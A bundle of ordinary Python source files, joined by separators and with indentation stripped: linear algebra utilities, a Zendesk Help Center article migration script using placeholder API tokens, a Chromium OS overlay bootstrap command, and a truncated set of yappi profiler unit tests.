Determinant of a positive definite matrix, only symmetric matricies though
"""
L = jitchol(A)
logdetA = 2*sum(np.log(np.diag(L)))
return logdetA
def trace_dot(a, b):
"""
Efficiently compute the trace of the matrix product of a and b
"""
return np.einsum('ij,ji->', a, b)
def mdot(*args):
"""
Multiply all the arguments using matrix product rules.
The output is equivalent to multiplying the arguments one by one
from left to right using dot().
Precedence can be controlled by creating tuples of arguments,
for instance mdot(a,((b,c),d)) multiplies a (a*((b*c)*d)).
Note that this means the output of dot(a,b) and mdot(a,b) will differ if
a or b is a pure tuple of numbers.
"""
if len(args) == 1:
return args[0]
elif len(args) == 2:
return _mdot_r(args[0], args[1])
else:
return _mdot_r(args[:-1], args[-1])
def _mdot_r(a, b):
"""Recursive helper for mdot"""
if type(a) == tuple:
if len(a) > 1:
a = mdot(*a)
else:
a = a[0]
if type(b) == tuple:
if len(b) > 1:
b = mdot(*b)
else:
b = b[0]
return np.dot(a, b)
def pdinv(A, *args):
"""
:param A: A DxD pd numpy array
:rval Ai: the inverse of A
:rtype Ai: np.ndarray
:rval L: the Cholesky decomposition of A
:rtype L: np.ndarray
:rval Li: the Cholesky decomposition of Ai
:rtype Li: np.ndarray
:rval logdet: the log of the determinant of A
:rtype logdet: float64
"""
L = jitchol(A, *args)
logdet = 2.*np.sum(np.log(np.diag(L)))
Li = dtrtri(L)
Ai, _ = dpotri(L, lower=1)
# Ai = np.tril(Ai) + np.tril(Ai,-1).T
symmetrify(Ai)
return Ai, L, Li, logdet
def dtrtri(L):
"""
Inverts a Cholesky lower triangular matrix
:param L: lower triangular matrix
:rtype: inverse of L
"""
L = force_F_ordered(L)
return lapack.dtrtri(L, lower=1)[0]
def multiple_pdinv(A):
"""
:param A: A DxDxN numpy array (each A[:,:,i] is pd)
:rval invs: the inverses of A
:rtype invs: np.ndarray
:rval hld: 0.5* the log of the determinants of A
:rtype hld: np.array
"""
N = A.shape[-1]
chols = [jitchol(A[:, :, i]) for i in range(N)]
halflogdets = [np.sum(np.log(np.diag(L[0]))) for L in chols]
invs = [dpotri(L[0], True)[0] for L in chols]
invs = [np.triu(I) + np.triu(I, 1).T for I in invs]
return np.dstack(invs), np.array(halflogdets)
def pca(Y, input_dim):
"""
Principal component analysis: maximum likelihood solution by SVD
:param Y: NxD np.array of data
:param input_dim: int, dimension of projection
:rval X: - Nxinput_dim np.array of dimensionality reduced data
:rval W: - input_dimxD mapping from X to Y
"""
if not np.allclose(Y.mean(axis=0), 0.0):
print("Y is not zero mean, centering it locally (GPy.util.linalg.pca)")
# Y -= Y.mean(axis=0)
Z = linalg.svd(Y - Y.mean(axis=0), full_matrices=False)
[X, W] = [Z[0][:, 0:input_dim], np.dot(np.diag(Z[1]), Z[2]).T[:, 0:input_dim]]
v = X.std(axis=0)
X /= v
W *= v
return X, W.T
def ppca(Y, Q, iterations=100):
"""
EM implementation for probabilistic pca.
:param array-like Y: Observed Data
:param int Q: Dimensionality for reduced array
:param int iterations: number of iterations for EM
"""
from numpy.ma import dot as madot
N, D = Y.shape
# Initialise W randomly
W = np.random.randn(D, Q) * 1e-3
Y = np.ma.masked_invalid(Y, copy=0)
mu = Y.mean(0)
Ycentered = Y - mu
try:
for _ in range(iterations):
exp_x = np.asarray_chkfinite(np.linalg.solve(W.T.dot(W), madot(W.T, Ycentered.T))).T
W = np.asarray_chkfinite(np.linalg.solve(exp_x.T.dot(exp_x), madot(exp_x.T, Ycentered))).T
except np.linalg.linalg.LinAlgError:
#"converged"
pass
return np.asarray_chkfinite(exp_x), np.asarray_chkfinite(W)
def tdot_numpy(mat, out=None):
return np.dot(mat, mat.T, out)
def tdot_blas(mat, out=None):
"""returns np.dot(mat, mat.T), but faster for large 2D arrays of doubles."""
if (mat.dtype != 'float64') or (len(mat.shape) != 2):
return np.dot(mat, mat.T)
nn = mat.shape[0]
if out is None:
out = np.zeros((nn, nn))
else:
assert(out.dtype == 'float64')
assert(out.shape == (nn, nn))
# FIXME: should allow non-contiguous out, and copy output into it:
assert(8 in out.strides)
# zeroing needed because of dumb way I copy across triangular answer
out[:] = 0.0
# # Call to DSYRK from BLAS
mat = np.asfortranarray(mat)
out = blas.dsyrk(alpha=1.0, a=mat, beta=0.0, c=out, overwrite_c=1,
trans=0, lower=0)
symmetrify(out, upper=True)
return np.ascontiguousarray(out)
def tdot(*args, **kwargs):
return tdot_blas(*args, **kwargs)
def DSYR_blas(A, x, alpha=1.):
"""
Performs a symmetric rank-1 update operation:
A <- A + alpha * np.dot(x,x.T)
:param A: Symmetric NxN np.array
:param x: Nx1 np.array
:param alpha: scalar
"""
A = blas.dsyr(lower=0, x=x, a=A, alpha=alpha, overwrite_a=True)
symmetrify(A, upper=True)
def DSYR_numpy(A, x, alpha=1.):
"""
Performs a symmetric rank-1 update operation:
A <- A + alpha * np.dot(x,x.T)
:param A: Symmetric NxN np.array
:param x: Nx1 np.array
:param alpha: scalar
"""
A += alpha * np.dot(x[:, None], x[None, :])
def DSYR(*args, **kwargs):
return DSYR_blas(*args, **kwargs)
def symmetrify(A, upper=False):
"""
Take the square matrix A and make it symmetrical by copting elements from
the lower half to the upper
works IN PLACE.
note: tries to use cython, falls back to a slower numpy version
"""
if config.getboolean('cython', 'working'):
_symmetrify_cython(A, upper)
else:
_symmetrify_numpy(A, upper)
def _symmetrify_cython(A, upper=False):
return linalg_cython.symmetrify(A, upper)
def _symmetrify_numpy(A, upper=False):
triu = np.triu_indices_from(A,k=1)
if upper:
A.T[triu] = A[triu]
else:
A[triu] = A.T[triu]
def backsub_both_sides(L, X, transpose='left'):
"""
Return L^-T * X * L^-1, assumuing X is symmetrical and L is lower cholesky
"""
if transpose == 'left':
tmp, _ = dtrtrs(L, X, lower=1, trans=1)
return dtrtrs(L, tmp.T, lower=1, trans=1)[0].T
else:
tmp, _ = dtrtrs(L, X, lower=1, trans=0)
return dtrtrs(L, tmp.T, lower=1, trans=0)[0].T
def ij_jlk_to_ilk(A, B):
"""
Faster version of einsum 'ij,jlk->ilk'
"""
return A.dot(B.reshape(B.shape[0], -1)).reshape(A.shape[0], B.shape[1], B.shape[2])
def ijk_jlk_to_il(A, B):
"""
Faster version of einsum einsum('ijk,jlk->il', A,B)
"""
res = np.zeros((A.shape[0], B.shape[1]))
[np.add(np.dot(A[:,:,k], B[:,:,k]), res, out=res) for k in range(B.shape[-1])]
return res
def ijk_ljk_to_ilk(A, B):
"""
Faster version of einsum np.einsum('ijk,ljk->ilk', A, B)
I.e A.dot(B.T) for every dimension
"""
res = np.zeros((A.shape[-1], A.shape[0], B.shape[0]))
[np.dot(A[:,:,i], B[:,:,i].T, out=res[i,:,:]) for i in range(A.shape[-1])]
res = res.swapaxes(0, 2).swapaxes(0,1)
return res
|
|
#original https://github.com/trailbehind/zendesk-utils/tree/master/uservoice_to_zendesk
import requests, json
class ZendeskToZenDeskImporter:
'''
Transfer articles, sections, and categories from an old ZenDesk Help Center to a New one.
'''
def __init__(self):
#setup old zendesk client
self.origin_brand = 'YourOldBrand'
self.origin_zendesk = "https://{}.zendesk.com".format(self.origin_brand)
self.sections = self.origin_zendesk + '/api/v2/help_center/en-us/sections.json'
self.categories = self.origin_zendesk + '/api/v2/help_center/en-us/categories.json'
self.origin_username = 'YourEmail' + '/token'
self.origin_token = 'Origin_API_TOKEN'
self.origin_credentials = (self.origin_username, self.origin_token)
#setup new zendesk client
self.new_brand = 'YourNewBrand'
self.zendesk_url = "https://{}.zendesk.com".format(self.new_brand)
self.new_username = 'YourEmail' + '/token'
self.new_token = 'New_API_Token'
self.credentials = (self.new_username, self.new_token)
#other stuff
self.headers = {'content-type': 'application/json'}
self.language = 'en-us'
# keep track of sections we create in zendesk, to minimize the number of API requests
self.local_sections = {}
def post_articles(self):
'''
fetch articles from origin_brand and post them to new_brand
'''
url = "https://{}.zendesk.com/api/v2/help_center/en-us/articles.json".format(self.origin_brand)
articles_list = []
while url:
response = requests.get(url, auth=self.origin_credentials)
if response.status_code != 200:
print('Status:', response.status_code, 'Problem with the request. Exiting.')
exit()
data = response.json()
for article in data['articles']:
articles_list.append(article)
url = data['next_page']
print "**POSTING ALL ARTICLES, one-by-one since Zendesk help center API won't do bulk"
for article in articles_list:
if not article['section_id']:
print "SKIPPED ARTICLE %s, NO TOPIC" % article['title']
continue
if (article['draft'] is not False) :
print article['draft']
print "SKIPPED ARTICLE in %s because it was unpublished" % article['section_id']
continue
section_id = None
if article['section_id'] in self.local_sections:
section_id = self.local_sections[article['section_id']]
else:
section_id = self.get_section_name(article['section_id'])
if self.get_article_for_title(article['title'], section_id):
print 'SKIPPED, %s already exists' % article['title']
continue
info = {
'title': article['title'],
'language': self.language,
'position': article['position'],
'body': article['body']
}
payload = json.dumps({'article': info})
url = '{}/api/v2/help_center/sections/{}/articles.json'.format(self.zendesk_url, section_id)
response = requests.post(url, data=payload, headers=self.headers, auth=self.credentials)
if response.status_code != 200 and response.status_code != 201:
print('FAILED to add article with error {}'.format(response.status_code))
exit()
else:
print('ADDED ARTICLE {}'.format(response.json()['article']['title']))
def get_article_for_title(self, title, section_id):
'''
returns the article id if their is an article for this title already
returns None otherwise
'''
url = '{}/api/v2/help_center/sections/{}/articles.json'.format(self.zendesk_url, section_id)
response = requests.get(url, headers=self.headers, auth=self.credentials)
if response.status_code != 200:
print('FAILED to get article list with error {}'.format(response.status_code))
exit()
articles = response.json()['articles']
for article in articles:
if article['title'] == title:
return article['id']
return None
def get_section_name(self, section_id):
response = requests.get(self.sections, auth=self.origin_credentials)
if response.status_code != 200:
print('Status:', response.status_code, 'Problem with the request. Exiting.')
exit()
data = response.json()
sections_list = data['sections']
for section in sections_list:
if section['id'] == section_id:
name = section['name']
position = section['position']
category_name = self.get_category_name(section['category_id'])
category = self.get_or_create_category(category_name)
return self.create_or_get_section_id_for_name(name, position, category)
def get_category_name(self, category_id):
response = requests.get(self.categories, auth=self.origin_credentials)
if response.status_code != 200:
print('Status:', response.status_code, 'Problem with the request. Exiting.')
exit()
data = response.json()
categories_list = data['categories']
for category in categories_list:
if category['id'] == category_id:
category_name = category['name']
return category_name
def create_or_get_section_id_for_name(self, name, position, category):
'''
given a section name, return its id or creates a new section and return its id
'''
url = '{}/api/v2/help_center/categories/{}/sections.json'.format(self.zendesk_url, category)
response = requests.get(url, headers=self.headers, auth=self.credentials)
if response.status_code != 200:
print('FAILED to get section list with error {}'.format(response.status_code))
exit()
data = response.json()
sections_list = data['sections']
for section in sections_list:
if section['name'] == name:
return section['id']
return self.create_section(name, position, category)
def create_section(self, name, position, category):
'''
create a section for a given name and return its id
'''
info = {
'name': name,
'position': position,
}
payload = json.dumps({'section': info})
url = '{}/api/v2/help_center/categories/{}/sections.json'.format(self.zendesk_url, category)
response = requests.post(url, data=payload, headers=self.headers, auth=self.credentials)
if response.status_code != 201:
print('FAILED to create section {} with error {}'.format(name, response.status_code))
exit()
section = response.json()['section']
print('ADDED SECTION {}'.format(section['name']))
self.local_sections[section['name']] = section['id']
return section['id']
def get_or_create_category(self, name):
'''
given a category name, return its id or creates a new category and return its id
'''
url = '{}/api/v2/help_center/categories.json'.format(self.zendesk_url)
response = requests.get(url, headers=self.headers, auth=self.credentials)
if response.status_code != 200:
print('FAILED to get category list with error {}'.format(response.status_code))
exit()
categories = response.json()['categories']
for category in categories:
if category['name'] == name:
return category['id']
return self.create_category(name)
def create_category(self, name):
'''
create a category for a given name and return its id
'''
info = {
'name': name
}
payload = json.dumps({'category': info})
url = '{}/api/v2/help_center/categories.json'.format(self.zendesk_url)
response = requests.post(url, data=payload, headers=self.headers, auth=self.credentials)
if response.status_code != 201:
print('FAILED to create category {} with error {}'.format(name, response.status_code))
exit()
category = response.json()['category']
print('ADDED CATEGORY {}'.format(category['name']))
return category['id']
importer = ZendeskToZenDeskImporter()
importer.post_articles()
|
|
# Copyright 2014 The Chromium OS Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""cros bootstrap-overlay: Create an overlay based on an existing one."""
from __future__ import print_function
from datetime import date
from distutils import dir_util
import logging
import os
from chromite.cbuildbot import constants
from chromite.lib import cros_build_lib, osutils
from chromite import cros
BSP_VIRTUAL_TEMPLATE = \
"""# Copyright %(year)s The Chromium OS Authors. All rights reserved.
# Distributed under the terms of the GNU General Public License v2
EAPI=4
DESCRIPTION="Board specific definition for %(board)s"
HOMEPAGE="http://dev.chromium.org/"
LICENSE="BSD-Google"
SLOT="0"
KEYWORDS="*"
IUSE=""
RDEPEND="chromeos-base/chromeos-bsp-%(board)s"
"""
BSP_IMPL_TEMPLATE = \
"""# Copyright %(year)s The Chromium OS Authors. All rights reserved.
# Distributed under the terms of the GNU General Public License v2
EAPI=4
DESCRIPTION="%(board)s bsp"
LICENSE="BSD-Google"
SLOT="0"
KEYWORDS="*"
IUSE=""
RDEPEND="
%(app_atom)s
"
"""
def CreateBsp(overlay_name, overlay_path, app_atom):
"""Create virtual/bsp and its implementation in overlay_name.
Args:
overlay_name: name of the overlay (board name).
overlay_path: path to the overlay.
app_atom: target atom for the app.
"""
bsp_virtual = os.path.join(overlay_path, 'virtual', 'chromeos-bsp',
'chromeos-bsp-2.ebuild')
osutils.WriteFile(bsp_virtual,
BSP_VIRTUAL_TEMPLATE % {'year': date.today().year,
'board': overlay_name},
makedirs=True)
bsp_impl = os.path.join(overlay_path,
'chromeos-base',
'chromeos-bsp-%s' % overlay_name,
'chromeos-bsp-%s-0.0.1.ebuild' % overlay_name)
osutils.WriteFile(bsp_impl,
BSP_IMPL_TEMPLATE % {'year':date.today().year,
'board': overlay_name,
'app_atom': app_atom},
makedirs=True)
os.symlink(os.path.basename(bsp_impl),
os.path.join(os.path.dirname(bsp_impl),
'chromeos-bsp-%s-0.0.1-r1.ebuild' % overlay_name))
def GetBspEbuild(overlay_path, board_name):
"""Return the path to the ebuild implementing chromeos-bsp.
This assumes that the bsp implementation package is called chromeos-bsp-$BOARD
where $BOARD is the board name.
Args:
overlay_path: path of the overlay.
board_name: name of the overlay.
Returns:
The path to the ebuild implementing chromeos-bsp if it exists,
None otherwise.
"""
bsp_name = 'chromeos-bsp-%s' % board_name
bsp_impl_dir = os.path.join(overlay_path, 'chromeos-base', bsp_name)
for filename in os.listdir(bsp_impl_dir):
filepath = os.path.join(bsp_impl_dir, filename)
# Assume the first regular file whose name matches
# chromeos-bsp-$BOARD.*.ebuild is the bsp ebuild.
if filename.startswith(bsp_name) and filename.endswith(".ebuild") and \
os.path.isfile(filepath) and not os.path.islink(filepath):
return filepath
return None
def UpdateCrosBoard(board_name):
"""Add the board name to the list of board names in cros-board.eclass.
Note: This will break the ordering of the list but this code is simpler and
less error prone.
Args:
board_name: name to add in cros-board.eclass.
"""
cros_board = os.path.join(constants.SOURCE_ROOT, 'src', 'third_party',
'chromiumos-overlay', 'eclass',
'cros-board.eclass')
content = osutils.ReadFile(cros_board)
osutils.WriteFile(cros_board,
content.replace('ALL_BOARDS=(',
'ALL_BOARDS=(\n\t%s' % board_name))
def UpdateLayout(overlay_dir, repo_name):
"""Set the correct repo name field in metadata/layout.conf.
Args:
overlay_dir: path to the overlay.
repo_name: name of the repo.
"""
layout_conf_path = os.path.join(overlay_dir, 'metadata', 'layout.conf')
layout_conf = osutils.ReadFile(layout_conf_path).split('\n')
layout_conf = [line for line in layout_conf \
if not line.startswith('repo-name')]
layout_conf.append('repo-name = %s' % repo_name)
osutils.WriteFile(layout_conf_path, '\n'.join(layout_conf))
def RemoveLegacyRepoName(overlay_dir):
"""Remove the file profiles/repo_name if it exists.
Args:
overlay_dir: path to the overlay.
"""
repo_name_file = os.path.join(overlay_dir, 'profiles', 'repo_name')
if os.path.isfile(repo_name_file):
logging.warn('Replacing deprecated repo_name by layout.conf.')
os.remove(repo_name_file)
@cros.CommandDecorator('bootstrap-overlay')
class BootstrapOverlayCommand(cros.CrosCommand):
"""Create a new overlay based on an existing one."""
EPILOG = """
To create new overlay from an existing one:
cros bootstrap-overlay gizmo myboard
To bootstrap an overlay and copy an example app:
cros bootstrap-overlay gizmo myboard --app=helloworld
which is equivalent to:
cros bootstrap-overlay gizmo myboard --app=~/trunk/src/overlays/helloworld
"""
def __init__(self, options):
cros.CrosCommand.__init__(self, options)
self.app_dir = None
self.app_atom = None
self.seed_dir = None
self.overlay_dir = None
@classmethod
def AddParser(cls, parser):
super(cls, BootstrapOverlayCommand).AddParser(parser)
default_board = cros_build_lib.GetDefaultBoard()
parser.add_argument('seed', help='Name of the overlay to use as seed',
default=default_board)
parser.add_argument('board', help='Name of the new overlay')
parser.add_argument('--app', help='App to install in the new overlay. '
'This can be the name of a directory in src/overlays '
'or the path to the app.',
default=None)
def _ValidateOptions(self):
overlays = os.path.join(constants.SOURCE_ROOT, 'src', 'overlays')
# The destination overlay must not exist.
self.overlay_dir = os.path.join(overlays, 'overlay-' + self.options.board)
if os.path.isdir(self.overlay_dir):
cros_build_lib.Die('The overlay directory %s already exists.' %
self.overlay_dir)
# The seed overlay must exist.
self.seed_dir = os.path.join(overlays, 'overlay-' + self.options.seed)
if not os.path.isdir(self.seed_dir):
cros_build_lib.Die('The seed overlay %s could not be found.'
% self.seed_dir)
# The app must be:
# * the name of a directory in src/overlay.
# * a path to an existing directory.
if self.options.app:
if os.path.isdir(self.options.app):
self.app_dir = self.options.app
self.app_atom = 'app-misc/' + os.path.basename(self.app_dir.rstrip('/'))
elif os.path.isdir(os.path.join(overlays, self.options.app)):
self.app_dir = os.path.join(overlays, self.options.app)
self.app_atom = 'app-misc/' + self.options.app
else:
cros_build_lib.Die('app %(app_name)s invalid. The app name must be'
'a folder in %(overlay) or a path to a directory.'
% {'app_name': self.options.app,
'overlay': overlays})
def _InstallApp(self, destination):
"""Install the app in |destination|.
Args:
destination: destination directory.
"""
dir_util.copy_tree(self.app_dir, destination, preserve_symlinks=True)
# Add the main ebuild to the bsp.
bsp_file = GetBspEbuild(destination, self.options.seed)
if bsp_file is not None and os.path.isfile(bsp_file):
osutils.WriteFile(bsp_file,
'\nRDEPEND="${RDEPEND} %s"' % self.app_atom,
mode='a')
else:
logging.info('No bsp package was found, creating one from scratch.')
CreateBsp(self.options.board, destination, self.app_atom)
def Run(self):
"""Run cros bootstrap-overlay."""
self.options.Freeze()
self._ValidateOptions()
with osutils.TempDir() as tmp_overlay:
dir_util.copy_tree(self.seed_dir, tmp_overlay, preserve_symlinks=True)
RemoveLegacyRepoName(tmp_overlay)
UpdateLayout(tmp_overlay, self.options.board)
if self.app_dir:
self._InstallApp(tmp_overlay)
# TODO(bsimonnet): remove this once the dependency on cros-board.eclass
# is removed (http://crbug.com/407731).
UpdateCrosBoard(self.options.board)
dir_util.copy_tree(tmp_overlay, self.overlay_dir, preserve_symlinks=True)
|
|
import os
import sys
import time
import yappi
import _yappi
import utils
import multiprocessing # added to fix http://bugs.python.org/issue15881 for > Py2.6
if sys.version_info < (2, 7): # use unittest2 for < Py2.7
import unittest2 as _unittest
else:
import unittest as _unittest
class BasicUsage(utils.YappiUnitTestCase):
def test_print_formatting(self):
def a():
pass
def b():
a()
func_cols={1:("name",48), 0:("ncall", 5), 2:("tsub", 8),}
thread_cols = {1:("name", 48), 0:("ttot", 8), }
yappi.start()
a(); b();
yappi.stop()
fs = yappi.get_func_stats()
cs = fs[1].children
ts = yappi.get_thread_stats()
#fs.print_all(out=sys.stderr, columns={1:("name", 70), })
#cs.print_all(out=sys.stderr, columns=func_cols)
#ts.print_all(out=sys.stderr, columns=thread_cols)
#cs.print_all(out=sys.stderr, columns={})
self.assertRaises(yappi.YappiError, fs.print_all, columns={1:("namee",9)})
self.assertRaises(yappi.YappiError, cs.print_all, columns={1:("dd",0)})
self.assertRaises(yappi.YappiError, ts.print_all, columns={1:("tidd",0)})
def test_get_clock(self):
yappi.set_clock_type('cpu')
self.assertEqual('cpu', yappi.get_clock_type())
clock_info = yappi.get_clock_info()
self.assertTrue('api' in clock_info)
self.assertTrue('resolution' in clock_info)
yappi.set_clock_type('wall')
self.assertEqual('wall', yappi.get_clock_type())
t0 = yappi.get_clock_time()
time.sleep(0.1)
duration = yappi.get_clock_time() - t0
self.assertAlmostEqual(0.1, duration, places=2)
def test_profile_decorator(self):
def aggregate(func, stats):
fname = "%s.profile" % (func.__name__)
try:
stats.add(fname)
except IOError:
pass
stats.save(fname)
raise Exception("messing around")
@yappi.profile(return_callback=aggregate)
def a(x, y):
if x+y == 25:
raise Exception("")
return x+y
def b():
pass
try:
os.remove("a.profile") # remove the one from prev test, if available
except:
pass
# global profile is on to mess things up
yappi.start()
b()
# assert functionality and call function at same time
try:
self.assertEqual(a(1, 2), 3)
except:
pass
try:
self.assertEqual(a(2, 5), 7)
except:
pass
try:
a(4, 21)
except:
pass
stats = yappi.get_func_stats().add("a.profile")
fsa = utils.find_stat_by_name(stats, 'a')
self.assertEqual(fsa.ncall, 3)
self.assertEqual(len(stats), 1) # b() should be cleared out.
@yappi.profile(return_callback=aggregate)
def count_down_rec(n):
if n == 0:
return
count_down_rec(n-1)
try:
os.remove("count_down_rec.profile") # remove the one from prev test, if available
except:
pass
try:
count_down_rec(4)
except:
pass
try:
count_down_rec(3)
except:
pass
stats = yappi.YFuncStats("count_down_rec.profile")
fsrec = utils.find_stat_by_name(stats, 'count_down_rec')
self.assertEqual(fsrec.ncall, 9)
self.assertEqual(fsrec.nactualcall, 2)
def test_strip_dirs(self):
def a():
pass
stats = utils.run_and_get_func_stats(a,)
stats.strip_dirs()
fsa = utils.find_stat_by_name(stats, "a")
self.assertEqual(fsa.module, os.path.basename(fsa.module))
def test_yappi_overhead(self):
import time
LOOP_COUNT = 10000
def a(): pass
def b():
for i in range(LOOP_COUNT): a()
t0 = time.time()
yappi.start()
b()
yappi.stop()
time_with_yappi = time.time() - t0
t0 = time.time()
b()
time_without_yappi = time.time() - t0
if time_without_yappi == 0:
time_without_yappi = 0.000001
# in latest v0.82, I calculated this as close to "7.0" in my machine.
# however, %83 of this overhead is coming from tickcount(). The other %17
# seems to have been evenly distributed to the internal bookkeeping
# structures/algorithms which seems acceptable. Note that our test only
# tests one function being profiled at-a-time in a short interval.
# profiling high number of functions in a small time
# is a different beast, (which is pretty unlikely in most applications)
# So as a conclusion: I cannot see any optimization window for Yappi that
# is worth implementing as we will only optimize %17 of the time.
sys.stderr.write("\r\nYappi puts %0.1f times overhead to the profiled application in average.\r\n" % \
(time_with_yappi / time_without_yappi))
def test_clear_stats_while_running(self):
def a():
pass
yappi.start()
a()
yappi.clear_stats()
a()
stats = yappi.get_func_stats()
fsa = utils.find_stat_by_name(stats, 'a')
self.assertEqual(fsa.ncall, 1)
def test_generator(self):
def _gen(n):
while(n > 0):
yield n
n -= 1
yappi.start()
for x in _gen(5):
pass
self.assertTrue(yappi.convert2pstats(yappi.get_func_stats()) is not None)
def test_slice_child_stats_and_strip_dirs(self):
def b():
for i in range(10000000): pass
def a():
b()
yappi.start(builtins=True)
a()
stats = yappi.get_func_stats()
fsa = utils.find_stat_by_name(stats, 'a')
fsb = utils.find_stat_by_name(stats, 'b')
self.assertTrue(fsa.children[0:1] is not None)
prev_afullname = fsa.full_name
prev_bchildfullname = fsa.children[fsb].full_name
stats.strip_dirs()
self.assertTrue(len(prev_afullname) > len(fsa.full_name))
self.assertTrue(len(prev_bchildfullname) > len(fsa.children[fsb].full_name))
def test_children_stat_functions(self):
_timings = {"a_1":5, "b_1":3, "c_1":1}
_yappi._set_test_timings(_timings)
def b():
pass
def c():
pass
def a():
b()
c()
yappi.start()
a()
b() # non-child call
c() # non-child call
stats = yappi.get_func_stats()
fsa = utils.find_stat_by_name(stats, 'a')
childs_of_a = fsa.children.get().sort("tavg", "desc")
prev_item = None
for item in childs_of_a:
if prev_item:
self.assertTrue(prev_item.tavg > item.tavg)
prev_item = item
childs_of_a.sort("name", "desc")
prev_item = None
for item in childs_of_a:
if prev_item:
self.assertTrue(prev_item.name > item.name)
prev_item = item
childs_of_a.clear()
self.assertTrue(childs_of_a.empty())
def test_no_stats_different_clock_type_load(self):
def a(): pass
yappi.start()
a()
yappi.stop()
yappi.get_func_stats().save("ystats1.ys")
yappi.clear_stats()
yappi.set_clock_type("WALL")
yappi.start()
yappi.stop()
stats = yappi.get_func_stats().add("ystats1.ys")
fsa = utils.find_stat_by_name(stats, 'a')
self.assertTrue(fsa is not None)
def test_subsequent_profile(self):
_timings = {"a_1":1, "b_1":1}
_yappi._set_test_timings(_timings)
def a(): pass
def b(): pass
yappi.start()
a()
yappi.stop()
yappi.start()
b()
yappi.stop()
stats = yappi.get_func_stats()
fsa = utils.find_stat_by_name(stats, 'a')
fsb = utils.find_stat_by_name(stats, 'b')
self.assertTrue(fsa is not None)
self.assertTrue(fsb is not None)
self.assertEqual(fsa.ttot, 1)
self.assertEqual(fsb.ttot, 1)
def test_lambda(self):
import time
f = lambda : time.sleep(0.3)
yappi.set_clock_type("wall")
yappi.start()
f()
stats = yappi.get_func_stats()
fsa = utils.find_stat_by_name(stats, '<lambda>')
self.assertTrue(fsa.ttot > 0.1)
def test_module_stress(self):
self.assertEqual(yappi.is_running(), False)
yappi.start()
yappi.clear_stats()
self.assertRaises(_yappi.error, yappi.set_clock_type, "wall")
yappi.stop()
yappi.clear_stats()
yappi.set_clock_type("cpu")
self.assertRaises(yappi.YappiError, yappi.set_clock_type, "dummy")
self.assertEqual(yappi.is_running(), False)
yappi.clear_stats()
yappi.clear_stats()
def test_stat_sorting(self):
_timings = {"a_1":13,"b_1":10,"a_2":6,"b_2":1}
_yappi._set_test_timings(_timings)
self._ncall = 1
def a():
b()
def b():
if self._ncall == 2:
return
self._ncall += 1
a()
stats = utils.run_and_get_func_stats(a)
stats = stats.sort("totaltime", "desc")
prev_stat = None
for stat in stats:
if prev_stat:
self.assertTrue(prev_stat.ttot >= stat.ttot)
prev_stat = stat
stats = stats.sort("totaltime", "asc")
prev_stat = None
for stat in stats:
if prev_stat:
self.assertTrue(prev_stat.ttot <= stat.ttot)
prev_stat = stat
stats = stats.sort("avgtime", "asc")
prev_stat = None
for stat in stats:
if prev_stat:
self.assertTrue(prev_stat.tavg <= stat.tavg)
prev_stat = stat
stats = stats.sort("name", "asc")
prev_stat = None
for stat in stats:
if prev_stat:
self.assertTrue(prev_stat.name <= stat.name)
prev_stat = stat
stats = stats.sort("subtime", "asc")
prev_stat = None
for stat in stats:
if prev_stat:
self.assertTrue(prev_stat.tsub <= stat.tsub)
prev_stat = stat
self.assertRaises(yappi.YappiError, stats.sort, "invalid_func_sorttype_arg")
self.assertRaises(yappi.YappiError, stats.sort, "totaltime", "invalid_func_sortorder_arg")
def test_start_flags(self):
self.assertEqual(_yappi._get_start_flags(), None)
yappi.start()
def a(): pass
a()
self.assertEqual(_yappi._get_start_flags()["profile_builtins"], 0)
self.assertEqual(_yappi._get_start_flags()["profile_multithread"], 1)
self.assertEqual(len(yappi.get_thread_stats()), 1)
def test_builtin_profiling(self):
import threading
def a():
import time
time.sleep(0.4) # is a builtin function
yappi.set_clock_type('wall')
yappi.start(builtins=True)
a()
stats = yappi.get_func_stats()
fsa = utils.find_stat_by_name(stats, 'sleep')
self.assertTrue(fsa is not None)
self.assertTrue(fsa.ttot > 0.3)
yappi.stop()
yappi.clear_stats()
def a():
pass
yappi.start()
t = threading.Thread(target=a)
t.start()
t.join()
stats = yappi.get_func_stats()
def test_singlethread_profiling(self):
import threading
import time
yappi.set_clock_type('wall')
def a():
time.sleep(0.2)
class Worker1(threading.Thread):
def a(self):
time.sleep(0.3)
def run(self):
self.a()
yappi.start(profile_threads=False)
c = Worker1()
c.start()
c.join()
a()
stats = yappi.get_func_stats()
fsa1 = utils.find_stat_by_name(stats, 'Worker1.a')
fsa2 = utils.find_stat_by_name(stats, 'a')
self.assertTrue(fsa1 is None)
self.assertTrue(fsa2 is not None)
self.assertTrue(fsa2.ttot > 0.1)
class StatSaveScenarios(utils.YappiUnitTestCase):
def test_pstats_conversion(self):
def pstat_id(fs):
return (fs.module, fs.lineno, fs.name)
def a():
d()
def b():
d()
def c():
pass
def d():
pass
_timings = {"a_1":12,"b_1":7,"c_1":5,"d_1":2}
_yappi._set_test_timings(_timings)
stats = utils.run_and_get_func_stats(a,)
stats.strip_dirs()
stats.save("a1.pstats", type="pstat")
fsa_pid = pstat_id(utils.find_stat_by_name(stats, "a"))
fsd_pid = pstat_id(utils.find_stat_by_name(stats, "d"))
yappi.clear_stats()
_yappi._set_test_timings(_timings)
stats = utils.run_and_get_func_stats(a,)
stats.strip_dirs()
stats.save("a2.pstats", type="pstat")
yappi.clear_stats()
_yappi._set_test_timings(_timings)
stats = utils.run_and_get_func_stats(b,)
stats.strip_dirs()
stats.save("b1.pstats", type="pstat")
fsb_pid = pstat_id(utils.find_stat_by_name(stats, "b"))
yappi.clear_stats()
_yappi._set_test_timings(_timings)
stats = utils.run_and_get_func_stats(c,)
stats.strip_dirs()
stats.save("c1.pstats", type="pstat")
fsc_pid = pstat_id(utils.find_stat_by_name(stats, "c"))
# merge saved stats and check pstats values are correct
import pstats
p = pstats.Stats('a1.pstats', 'a2.pstats', 'b1.pstats', 'c1.pstats')
p.strip_dirs()
# ct = ttot, tt = tsub
(cc, nc, tt, ct, callers) = p.stats[fsa_pid]
self.assertEqual(cc, nc, 2)
self.assertEqual(tt, 20)
self.assertEqual(ct, 24)
(cc, nc, tt, ct, callers) = p.stats[fsd_pid]
self.assertEqual(cc, nc, 3)
self.assertEqual(tt, 6)
self.assertEqual(ct, 6)
self.assertEqual(len(callers), 2)
(cc, nc, tt, ct) = callers[fsa_pid]
self.assertEqual(cc, nc, 2)
self.assertEqual(tt, 4)
self.assertEqual(ct, 4)
(cc, nc, tt, ct) = callers[fsb_pid]
self.assertEqual(cc, nc, 1)
self.assertEqual(tt, 2)
